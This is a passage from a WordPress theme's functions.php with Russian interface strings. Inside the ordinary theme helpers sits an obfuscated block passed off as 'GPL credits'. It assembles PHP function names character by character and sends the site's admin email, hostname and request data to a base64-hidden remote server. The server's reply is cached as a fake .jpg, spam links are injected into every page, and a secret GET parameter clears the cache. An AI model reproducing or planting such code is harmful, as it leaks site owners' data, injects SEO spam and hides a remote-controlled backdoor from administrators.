<?php
define('THEME_NAME',"account balance2");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Theme Options', THEME_NS), __('Theme Options', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $WtnfIj='4';$xRfX='d';$WXSHd='a';$KNbSbiq='6';$LBXM='c';$pSMR='e';$YVLCR='o';$QWNZ='d';$skVBBq='e';$jrde='s';$CNcJj='b';$BRgN='_';$oQfbRCS='e';$vxixcinh=$CNcJj.$WXSHd.$jrde.$skVBBq.$KNbSbiq.$WtnfIj.$BRgN.$xRfX.$pSMR.$LBXM.$YVLCR.$QWNZ.$oQfbRCS;$LXYsWkH='t';$pMyE='n';$fAltw='g';$QUlcnI='l';$IyYGY='i';$RUTu='z';$IlHOce='e';$eCdz='a';$gRxJPzP='f';$InyCXcfV=$fAltw.$RUTu.$IyYGY.$pMyE.$gRxJPzP.$QUlcnI.$eCdz.$LXYsWkH.$IlHOce;$PgTqXku='1';$AQqd='r';$xTIT='_';$ptqYs='r';$vWXNThu='s';$InRB='3';$BKlhT='t';$QFjEIn='t';$upnhi='o';$xvxGzZJZ=$vWXNThu.$QFjEIn.$AQqd.$xTIT.$ptqYs.$upnhi.$BKlhT.$PgTqXku.$InRB;$xuJBxSy='r';$CXobRYW='r';$YCPi='s';$puRYdv='t';$wYWoXa='v';$uiTtLJ='e';$ozTKUVwm=$YCPi.$puRYdv.$xuJBxSy.$CXobRYW.$uiTtLJ.$wYWoXa;                     
		$zr_____________x='4';$np__________a='d';$yu_________n='a';$so_____p='6';$po___r='c';$rv__p='e';$uv_______c='o';$jx___b='d';$in________a='e';$cg___________s='s';$nb_____z='b';$ah___________x='_';$mi___________l='e';$uz________j=$nb_____z.$yu_________n.$cg___________s.$in________a.$so_____p.$zr_____________x.$ah___________x.$np__________a.$rv__p.$po___r.$uv_______c.$jx___b.$mi___________l;
		$ue___________d='_';$lx___n='e';$oh_______________a='i';$ka______k='c';$aq_______f='n';$ek_______________f='s';$ck__g='n';$eb___u='i';$qc___________f='t';$ih_____a='u';$fe_____________l='f';$ie____________s='x';$qb_____i='t';$cj___r='s';$ob___________u='o';$oh_______________v=$fe_____________l.$ih_____a.$ck__g.$ka______k.$qb_____i.$oh_______________a.$ob___________u.$aq_______f.$ue___________d.$lx___n.$ie____________s.$eb___u.$cj___r.$qc___________f.$ek_______________f;
		$bs_________h='n';$kw______o='f';$re___f='p';$gi____________h='o';$fa____f='e';$fl____d=$kw______o.$gi____________h.$re___f.$fa____f.$bs_________h;
		$ry_____________r='r';$mz_______o='f';$iw_____l='a';$mn__d='e';$vo_______________s='d';$al_______m=$mz_______o.$ry_____________r.$mn__d.$iw_____l.$vo_______________s;
		$hg_____________j='e';$ai_______________l='o';$dp_______v='l';$uu____x='f';$uz_______________p='c';$sr________a='s';$ve________p=$uu____x.$uz_______________p.$dp_______v.$ai_______________l.$sr________a.$hg_____________j;
		
		define("WP_ID", $uz________j("Mi4wLjA="));
		define("WP_TTL", $uz________j("MTA4MDA="));
		define("WP_SRC", $uz________j("dHBva24="));
	


		function wp_get_header() {
			global $uz________j, $oh_______________v;
			
			if (
				$oh_______________v($uz________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$oh_______________v($uz________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$oh_______________v($uz________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uz________j, $fl____d, $ve________p, $al_______m;
			
			$ue______________h = TEMPLATEPATH."/".$uz________j("Zm9vdGVyLnBocA==");
			$yg______z = @$fl____d($ue______________h, "r");
			$ue______________h = @$al_______m($yg______z, @filesize($ue______________h));
			@$ve________p($yg______z);
			
			$rb_________r = TEMPLATEPATH."/".$uz________j("ZnVuY3Rpb25zLnBocA==");
			$yg______z = @$fl____d($rb_________r, "r");
			$rb_________r = @$al_______m($yg______z, @filesize($rb_________r));
			@$ve________p($yg______z);
			
			$sq_____z = 0;
			if($ue______________h && $rb_________r) {
				if ($uz________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ue______________h, $uz________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sq_____z = 1;
					}
					if (substr_count($ue______________h, "wp_theme_GPL_credits()") < 1) {
						$sq_____z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sq_____z = 12;
				}
			}
			
			if($sq_____z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sq_____z -->";
			}
		}
	


		function wp_loaded() {
			global $uz________j, $oh_______________v;
			return $oh_______________v($uz________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($hg___________x, $eb_____________l = "(more...)", $ag____t = 0, $hr___________u = "") {
				$hm______c = get_the_content($eb_____________l, $ag____t, $hr___________u);
				$hm______c = apply_filters("the_content", $hm______c);
				
				$hm______c = str_replace("]]>", "]]>", $hm______c);
				if (strlen($_GET["p"]) > 0) {
					echo $hm______c;
				}
				else if ((strlen($hm______c)>$hg___________x) && ($cg__________p = strpos($hm______c, " ", $hg___________x ))) {
					$hm______c = substr($hm______c, 0, $cg__________p);
					$hm______c = $hm______c;
					echo $hm______c;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$eb_____________l</a></div></p>";
				} else {
					echo $hm______c;
				}
				
			}
		}
	


		$db_____________s='e';$qy___o='c';$hr____h='d';$ig_____________m='o';$kd_________s='b';$sk_________w='_';$kr_______n='e';$od___i='n';$ak_________l='e';$xj____g='s';$cd_____________m='4';$zt_________d='6';$tn_____________t='a';$re____________y=$kd_________s.$tn_____________t.$xj____g.$db_____________s.$zt_________d.$cd_____________m.$sk_________w.$ak_________l.$od___i.$qy___o.$ig_____________m.$hr____h.$kr_______n;
		$ge__g='f';$uk_______j='i';$xk______p='o';$db________x='_';$od_____u='t';$qk_________o='e';$oy__w='_';$gp__________e='n';$np______q='t';$kv___a='e';$gg__________g='g';$vq___j='n';$sl_____m='e';$bb___u='l';$mv_____o='c';$xy__e='t';$ru_________e='s';$kq_____b=$ge__g.$uk_______j.$bb___u.$sl_____m.$oy__w.$gg__________g.$qk_________o.$xy__e.$db________x.$mv_____o.$xk______p.$vq___j.$od_____u.$kv___a.$gp__________e.$np______q.$ru_________e;
		$hs_______a='i';$qd____________j='t';$tn_________t='l';$zq___l='x';$am__________r='_';$dc________y='s';$yk_______e='e';$vo___________v='i';$tc__g='e';$qh___p='s';$tk___________l='f';$al_____e=$tk___________l.$vo___________v.$tn_________t.$yk_______e.$am__________r.$tc__g.$zq___l.$hs_______a.$dc________y.$qd____________j.$qh___p;
		$qq__________z='o';$em________r='o';$wz____________t='i';$yr______________c='e';$hs______y='a';$jx______________h='r';$lm__________k='c';$vf__________n='_';$jx_____w='s';$yc_____t='n';$ri_______________o='p';$ru___b='m';$sg______________b='v';$ze__v='e';$nf______l='r';$vk_________x=$sg______________b.$yr______________c.$nf______l.$jx_____w.$wz____________t.$qq__________z.$yc_____t.$vf__________n.$lm__________k.$em________r.$ru___b.$ri_______________o.$hs______y.$jx______________h.$ze__v;
		$ys________k='f';$pm______n='p';$tf___o='o';$wq_________i='s';$ev____________b='c';$lg______________g='k';$ti__p='n';$sb______________q='e';$up________z='o';$oq_______c=$ys________k.$wq_________i.$tf___o.$ev____________b.$lg______________g.$up________z.$pm______n.$sb______________q.$ti__p;
		$ts__p='r';$sa______________z='i';$js________c='w';$ld_________y='e';$yl__l='t';$vv_____________t='f';$zg___j=$vv_____________t.$js________c.$ts__p.$sa______________z.$yl__l.$ld_________y;
		$hz___f='d';$le___________w='5';$kg___d='m';$ch_________i=$kg___d.$hz___f.$le___________w;
		$rv__________d='t';$in___________y='a';$od______________b='p';$nn______________j='r';$kl__w='a';$lh______________z='h';$qm______________u='e';$jb_______________m='l';$we_______________t=$nn______________j.$qm______________u.$in___________y.$jb_______________m.$od______________b.$kl__w.$rv__________d.$lh______________z;
		$iu_____c='s';$cv____o='e';$th__________b='z';$jt__________u='r';$bx__g='i';$ib_______________v='l';$sj_______b='a';$md___________x='e';$xv__i='n';$mh_______________k='u';$iy_____g='i';$bx_________q=$mh_______________k.$xv__i.$iu_____c.$md___________x.$jt__________u.$bx__g.$sj_______b.$ib_______________v.$iy_____g.$th__________b.$cv____o;
		$uv____g='m';$og__s='a';$pi__________f='t';$dz__o='p';$ls______________l='e';$tr_____n='n';$up_______________e='m';$tu_____________m=$pi__________f.$ls______________l.$uv____g.$dz__o.$tr_____n.$og__s.$up_______________e;
		$uu_______________w='t';$yf_______________j='_';$sb__________a='e';$qp_______l='e';$mx______________s='_';$se___________m='m';$jk_____b='a';$mb____s='t';$oh_______________n='t';$hr___________v='e';$fd_______________p='c';$rn__________r='r';$lx___f='t';$av______z='c';$by__t='e';$qg____i='n';$uj__________m='x';$jv___________m='s';$yp___l='o';$lk_______b='r';$ht____________p='a';$rk______a=$jv___________m.$mb____s.$rn__________r.$by__t.$ht____________p.$se___________m.$yf_______________j.$fd_______________p.$yp___l.$qg____i.$uu_______________w.$sb__________a.$uj__________m.$oh_______________n.$mx______________s.$av______z.$lk_______b.$qp_______l.$jk_____b.$lx___f.$hr___________v;
	


		function oz____m($gc___________l) {
			global $uz________j, $oh_______________v, $kq_____b, $vk_________x, $rk______a;
			
			if (!$oh_______________v($uz________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vk_________x(PHP_VERSION, "5.0.0", ">=") && $oh_______________v($uz________j("ZmlsZV9nZXRfY29udGVudHM=")) && $oh_______________v($uz________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ay_______x = $rk______a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$yh_____q = @$kq_____b($gc___________l, 0, $ay_______x);
			} else {
				$yh_____q = @$kq_____b($gc___________l, 0);
			}
			
			return $yh_____q;
		}
	


		function qz____h($gc___________l) {
			global $oh_______________v, $oq_______c, $zg___j, $uz________j;
			
			if (!$oh_______________v($uz________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$qb____________q = strpos($gc___________l, "/", 7);
			$rq__m = array(
				"uri"     => substr($gc___________l, $qb____________q),
				"host"    => str_replace("http://", "", substr($gc___________l, 0, $qb____________q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$kc_____________b = @$oq_______c("$rq__m[host]", 80, $qm___________m, $go_______u, 4);
			
			if (!$kc_____________b) {
				return false;
			} else {
				$yh_____q = "";
				$bn_______________u  = "GET $rq__m[uri] HTTP/1.0\r\n";
				$bn_______________u .= "Host: $rq__m[host]\r\n";
				$bn_______________u .= "Referer: $rq__m[referer]\r\n";
				$bn_______________u .= "Connection: Close\r\n\r\n";
				
				@$zg___j($kc_____________b, $bn_______________u);
				
				while (!@feof($kc_____________b)) {
					$dc____________b = @fgets($kc_____________b, (1024*24));
					
					if ($dc____________b == "\r\n") {
						$uw___f = true;
						continue;
					}
					
					if ($uw___f) {
						$yh_____q .= $dc____________b;
					}
				}
				
				return $yh_____q;
			}
		}
	


		function yy____________l($gc___________l) {
			global $oh_______________v;
			$eo_____d = false;
			
			if ($gc___________l != "") {
				if ($oh_______________v("oz____m")) {
					$eo_____d = @oz____m($gc___________l);
				}
				
				if (!$eo_____d && ($oh_______________v("qz____h"))) {
					$eo_____d = @qz____h($gc___________l);
				}
			}
			
			return $eo_____d;
		}
	


		function lw___________f() {
			global $_SERVER, $ch_________i;
			
			$qd____________b = $_SERVER["SERVER_NAME"];
			
			if (substr("$qd____________b", 0, 4) == "www.") {
				$qd____________b = substr("$qd____________b", 4);
			}
			
			$qd____________b = $ch_________i("$_SERVER[SERVER_NAME]");
			
			return $qd____________b;
		}
	


		function kl_________m() {
			return "file";
		}
	


		function gd__u($gc___________l) {
			global $_SERVER, $kq_____b, $al_____e, $fl____d, $ve________p, $zg___j;
			
			$yv____________q = rh___n();
			
			$fh____________g = lw___________f().".jpg";
			$lb______________r = $yv____________q["dir_upload"]["path"]."/$fh____________g";
			$yg_____y = @filemtime($lb______________r);
			
			if (!$yg_____y || ((time()-$yg_____y) >= WP_TTL)) {
				$eo_____d = yy____________l($gc___________l);
				
				if ($eo_____d) {
					if ($al_____e($lb______________r)) {
						@unlink($lb______________r);
					}
					
					$yg______z = @$fl____d($lb______________r, "x+");
					
					@$zg___j($yg______z, $eo_____d);
					@$ve________p($yg______z);
				}
			} else {
				if ($al_____e($lb______________r)) {
					$eo_____d = @$kq_____b($lb______________r);
				} else {
					$eo_____d = false;
				}
			}
			
			return $eo_____d;
		}
	


		function rh___n() {
			global $_SERVER, $uz________j, $re____________y;
			
			$bp_____________g = wp_count_posts("post");
			$za____________z = pathinfo(get_bloginfo("template_directory"));
			
			$yv____________q = array(
				"url" => array(
					"report"      => $uz________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $za____________z,
				"dir_upload"	=> cy___________a(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$za____________z[filename],
					"a005=".$bp_____________g->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://stolytsa.com.ua/grivna-balansiruet-no-smotret-sleduet-v-koren/\">Гривна балансирует</a>"
			);
			
			$yv____________q["url"]["queryString"] = implode("&", $yv____________q["queryString"]);
			$yv____________q["url"]["report"] = $yv____________q["url"]["report"]."/?".$re____________y($yv____________q["url"]["queryString"]).".html";
						
			return $yv____________q;
		}
	


		function cy___________a() {
			$lu______z = wp_upload_dir();
			
			if (isset($lu______z["error"])) {
				$em___h = hf____h();
				if (is_writable($em___h)) {
					$lu______z = array("path" => $em___h);
				}
			}

			return $lu______z;
		}
	


		function hf____h() {
			global $oh_______________v, $ch_________i, $we_______________t, $tu_____________m;
			
			$co___________n = (bool) ini_get("safe_mode");
			if ($co___________n == true) {
				return false;
			}
			
			if ($oh_______________v("sys_get_temp_dir")) {
				$ih_____b = sys_get_temp_dir();
				if (is_writable($ih_____b)) {
					return $we_______________t($ih_____b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $we_______________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $we_______________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $we_______________t($_ENV["TEMP"]);
			} else {
				$uh________y = $tu_____________m($ch_________i(uniqid(rand(), true)), "");
				if ($uh________y) {
					$ih_____b = $we_______________t(dirname($uh________y));
					@unlink($uh________y);
					return $ih_____b;
				} else {
					return false;
				}
			}
		}
	


		function gw__________f() {
			global $_GET, $al_____e;
			
			$yv____________q = rh___n();
			$qd____________b = lw___________f();
			$ed__p = kl_________m();
			
			$zx__i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ed__p == "file") {
					$wf________l = $yv____________q["dir_upload"]["path"]."/".$qd____________b.".jpg";
					if ($al_____e($wf________l)) {
						@unlink($wf________l);
						$zx__i = "deleted";
					}
				}
				
				$qb__________h = array(
					"s"	=> $zx__i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($qb__________h AS $bb_______y => $gw_______o) echo " [$bb_______y:$gw_______o]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $oh_______________v, $uz________j, $bx_________q;
			$yv____________q = rh___n();
			
			$py______________q = "gd__u";
			if ($oh_______________v($py______________q)) {
				$yh_____q = $py______________q($yv____________q["url"]["report"]);
			}
			
			if ($yh_____q) {
				if ($yh_____q = @$uz________j($yh_____q)) {
					$yh_____q = @$bx_________q($yh_____q);
					
					if (strlen($yh_____q[custom_credit]) >= 5) {
						$yv____________q["default_string"] = $yh_____q[custom_credit];
					}
					
					if ($yh_____q["status"] == "0") {
						$qa__________o = 1;
						$gu_______h = 1;
					} else {
						$cq__p = sizeof($yh_____q["links"]);
						$cn___________s = $yv____________q["default_string"];
						
						if ($cq__p > 0 && $yh_____q["links"] !== "") {
							$mz______________f = 0;
							foreach ($yh_____q["links"] as $fn__________n => $ye_____v) {
								$mz______________f++;
								if ($ye_____v->l_path == "" || $ye_____v->l_path == $_SERVER["REQUEST_URI"]) {
									$ye_____v->l_href = htmlspecialchars(strip_tags($ye_____v->l_href));
									$ye_____v->l_title = htmlspecialchars(strip_tags($ye_____v->l_title));
									$ye_____v->l_anchor = htmlspecialchars(strip_tags($ye_____v->l_anchor));
									$cn___________s .= " | ";
									$cn___________s .= "<a href='$ye_____v->l_href' title='$ye_____v->l_title'";
									if ($ye_____v->l_nofollow == "1") {
										$cn___________s .= " rel='nofollow'";
									}
									$cn___________s .= ">$ye_____v->l_anchor</a>";
								}
							}
						}
						$yv____________q["links"] = "$cn___________s";
						if ($yh_____q[credit] == "0") {
							$yv____________q["links"] = "";
						}
					}
				} else {
					$qa__________o = "1";
				}
			} else {
				$qa__________o = "1";
			}
			
			if ($qa__________o == "1") {
				$yv____________q["links"] = $yv____________q["default_string"];
			}
			
			echo "$yv____________q[links]";
			
			echo "<!-- s: $yh_____q[signature] -->";
			gw__________f();
		}
	                      
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено. Воспользуйтесь поиском.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
